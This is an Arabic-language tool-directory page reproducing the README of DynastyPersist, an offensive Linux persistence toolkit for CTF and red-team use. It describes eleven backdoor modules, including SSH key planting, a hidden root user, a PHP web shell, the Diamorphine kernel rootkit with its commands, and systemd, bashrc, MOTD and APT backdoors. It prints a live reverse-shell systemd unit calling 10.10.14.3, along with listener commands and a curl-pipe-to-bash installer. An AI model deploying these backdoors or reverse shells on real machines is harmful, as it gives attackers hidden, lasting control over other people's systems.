Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
DynastyPersist — أداة استمرارية لينكس مع 11 وحدة لإنشاء باب خلفي لمفاتيح SSH، والمهام المجدولة (cronjobs)، وخدمات systemd، وجذور خفية LKM، وتصعيد الامتيازات باستخدام LD_PRELOAD. مصممة لمسابقات CTF وعمليات الفريق الأحمر. | Kitploit
أدوات/GitHubGitHub/trevohack/dynastypersist
تصعيد الامتيازاتآليات الاستمراريةما بعد الاستغلالCTFاختبار الاختراقالفريق الأحمر
GitHubtrevohack/dynastypersist

DynastyPersist

أداة استمرارية لينكس مع 11 وحدة لإنشاء باب خلفي لمفاتيح SSH، والمهام المجدولة (cronjobs)، وخدمات systemd، وجذور خفية LKM، وتصعيد الامتيازات باستخدام LD_PRELOAD. مصممة لمسابقات CTF وعمليات الفريق الأحمر.

عرض المستودع
16221منذ 11 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

DynastyPersist 1.5

DynastyPersist: أداة مبسطة لتحقيق الاستمرارية في لينكس بسهولة.
تدعم KoTH و Battlegrounds وعمليات الاختراق

GitHub License GitHub Repo stars Static Badge

تثبيت • توثيق • استخدام

صورة

التوثيق

[ الميزات ]

الميزاتالوصف
توليد مفتاح SSHيولد مفاتيح SSH تلقائياً للوصول الخفي.
استمرارية Cronjobإعداد cronjobs لاستمرارية مجدولة.
مستخدم مخصص بصلاحيات الجذرإنشاء مستخدم مخصص بصلاحيات الجذر.
استمرارية RCEتحقيق الاستمرارية من خلال تنفيذ الأوامر عن بعد
LKM/Rootkitيوضح استمرارية rootkit القائمة على وحدات Kernel لينكس (LKM).
استمرارية Bashrcتعديل ملفات تهيئة shell الخاصة بالمستخدم للاستمرارية (الأسماء المستعارة / القشور العكسية).
خدمة Systemd للجذرإعداد خدمة systemd لتحقيق استمرارية الجذر.
تكوين تصعيد الصلاحيات عبر LD_PRELOADتكوين LD_PRELOAD لتصعيد الصلاحيات.
باب خلفي لرسالة اليوم / الرأسوضع باب خلفي لعرض رسالة النظام للوصول الخفي.
تعديل خدمة Systemd موجودةالتلاعب بخدمة systemd موجودة للاستمرارية.
باب خلفي لأمر APTوضع باب خلفي لأمر apt لإظهار قوقعة.

[ الوحدات ]

توليد مفتاح SSH

  • الوصول إلى الخادم باستخدام توليد مفتاح ssh. تنشئ هذه الوحدة مفتاح id_rsa لكل مستخدم. يمكن استخدامه للوصول العكسي. بعد تشغيل هذه الوحدة، يمكن للمهاجم الاتصال بالخادم عبر ssh.

  • يمكن القيام بذلك يدوياً باستخدام الأمر ssh-keygen. لكن الوحدة تنشئ مفتاحاً خاصاً لكل مستخدم في وقت قصير.

root@kitploit:~
root@kali ~ ssh -i id_rsa [email protected]
  • رقم الوحدة: 1

استمرارية Cronjob

  • Cronjobs في لينكس هي مهام مجدولة تعمل تلقائياً على فترات محددة.

  • واحدة من أكثر الوحدات فاعلية، والتي تتضمن قشور عكسية. تكتب هذه الوحدة أوامر القشرة العكسية مباشرة إلى /etc/crontab. مما سيفتح قوقعة على المنفذ الذي تستمع عليه.

root@kitploit:~
root@kali ~ nc -nvlp 9999
  • رقم الوحدة: 2

مستخدم مخصص بصلاحيات الجذر

  • طريقة بسيطة وسريعة للوصول العكسي. ببساطة، تنشئ هذه الوحدة مستخدماً آخر بصلاحيات الجذر. لاحقاً، يمكن للمهاجم تسجيل الدخول إلى المستخدم عبر ssh.
root@kitploit:~
root@kali ~ ssh [email protected]
  • رقم الوحدة: 3

استمرارية RCE

  • تأتي هذه الوحدة مع سكريبت php مستضاف في دليل جذر الويب. السكريبت موجود في /var/www/html/dynasty_rce/rce.php. علاوة على ذلك، يمكن إخفاء البادئة dynasty_rce إذا تم تشغيل وحدة LKM قبل ذلك.

  • زيارة victim_ip:port/dynasty_rce/rce.php ستمنحك القدرة على تشغيل الأوامر داخل القوقعة.

  • رقم الوحدة: 4

LKM Rootkit

  • طريقة استمرارية متقدمة، تزرع rootkit في نواة الخادم. يركز البرنامج على rootkit LKM مفتوح المصدر يسمى Diamorphine. الوحدة موجودة في /var/tmp/.memory كموقع مؤقت. يتم حذف هذا الدليل بعد إعداد الوحدة.
  • يوضح مقطع الكود أدناه استخدامات هذه الوحدة.
root@kitploit:~
victim@ubuntu ~ kill -64 0 # رفع الصلاحيات إلى الجذر. 
victim@ubuntu ~ mkdir dynasty_persist # أي دليل يبدأ بـ dynasty سيتم إخفاؤه.
victim@ubuntu ~ kill -31 <process> # إخفاء العمليات
victim@ubuntu ~ lsmod | grep -i diamorphine # إخفاء نفسه 
victim@ubuntu ~ kill -63 0 # جعله يظهر في ناتج lsmod
  • رقم الوحدة: 5

استمرارية Bashrc

  • تكتب هذه الوحدة أوامر قشرة عكسية، وأسماء مستعارة، ومتغيرات للوصول العكسي. يتم منح قوقعة عندما يسجل مستخدم الدخول إلى الخادم أو عندما يستخدم الشخص find أو cat.
root@kitploit:~
root@kali ~ nc -nvlp 9999
  • رقم الوحدة: 6

خدمة Systemd للجذر

  • وحدة تنشئ خدمة مخصصة في systemd للوصول العكسي.

  • مثال:

root@kitploit:~
Description=Dynasty Persist

[Service]
ExecStart=sudo bash /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.3/9999 0>&1'
Restart=always
RestartSec=30

[Install]
WantedBy=default.target"
  • سينشئ المثال أعلاه خدمة. هذه الطريقة فعالة ومتينة.

  • رقم الوحدة: 7

تكوين تصعيد الصلاحيات عبر LD_PRELOAD

  • LD_PRELOAD هو متغير بيئة في لينكس يسمح للمستخدمين بتحميل مكتبة مشتركة قبل المكتبات الأخرى. يتضمن تصعيد الصلاحيات باستخدام LD_PRELOAD تحميل مكتبة خبيثة لاعتراض وتعديل استدعاءات النظام، مما قد يمنح صلاحيات مرتفعة. تقوم الوحدة بوضع باب خلفي لأوامر مثل find و wget.

  • رقم الوحدة: 8

باب خلفي لرسالة اليوم / الرأس

  • "رسالة اليوم" (MOTD) في لينكس هي نص قابل للتخصيص يُعرض للمستخدمين عند تسجيل الدخول، لتقديم معلومات أو تحديثات حول النظام. عادةً ما تكون مخزنة في ملف /etc/motd ويمكن تعديلها من قبل مسؤولي النظام.

  • تكتب هذه الوحدة قوقعة إلى /etc/update-motd.d/00-header. يتم تشغيل هذا عادةً عند تسجيل دخول المستخدم.

  • رقم الوحدة: 9

تعديل خدمة Systemd موجودة

  • على غرار الوحدة 7، تقوم هذه الوحدة بتعديل خدمة موجودة للوصول العكسي.

  • ببساطة، تعيد كتابة ExecStartPre في الخدمة إلى أمر قشرة عكسية.

  • رقم الوحدة: 10

باب خلفي لـ APT

  • "APT" تعني "أداة إدارة الحزم المتقدمة"، وتستخدم عادة في أنظمة دبيان مثل أوبونتو. سيكون الملف هنا: /etc/apt/apt.conf.d/42backdoor

  • تضع باباً خلفياً لأمر apt، كلما تم تشغيل apt ستظهر قوقعة.

  • رقم الوحدة: 11

[ الأوضاع ]

  • حالياً، يتوفر وضعان في التحديث الأخير (1.4).

  • الأوضاع هي console و ctf وهي مصممة للعمل بسلوك معين.

  • بالمقارنة، يأتي وضع console بميزات واستقرار أكثر من وضع ctf.

Console

  • وضع console يدخل الأداة في الإعدادات المعتادة، بجميع الميزات. سيتم تشغيل هذه الميزات محلياً على المضيف المحلي حيث يتم تنفيذ السكريبت. مصمم للاستمرارية في العمليات الفعلية.

  • سيتم استخدام البادئة use متبوعة برقم الوحدة لتشغيل أي وحدة محددة. مثل use 1

  • أيضاً، تم تحديث الواجهة، الوحدات/الحمولات أصبحت مرئية الآن عند كتابة show payloads.

  • أخيراً، تم تعديل قائمة المساعدة/الخيارات، أدخل show options لعرضها.

CTF

  • وضع ctf هو ميزة إضافية لتسجيل الدخول إلى خادم تم اختراقه عبر SSH وتحقيق الاستمرارية. ستساعد هذه الإضافة كثيراً في KoTH أو Battlegrounds. علاوة على ذلك، ستوفر الكثير من الوقت المستغرق في إعداد الاستمرارية.

  • يشغل معظم الوظائف الموجودة في console.

[ الاستخدام ]

  • يتم شرح بناء الجملة لاستخدام الأداة أدناه:
root@kitploit:~
$ ./dynasty.sh <lhost> <lport> <mode> 
$ ./dynasty.sh ctf 
$ ./dynasty.sh 10.10.14.3 9999 console 

التثبيت

عبر Git

root@kitploit:~
$ git clone https://github.com/Trevohack/DynastyPersist
$ cd DynastyPersist/src 

عبر Curl

root@kitploit:~
$ curl -sSL https://raw.githubusercontent.com/Trevohack/DynastyPersist/main/src/dynasty.sh | bash

شكراً لك!

تنزيل الأداة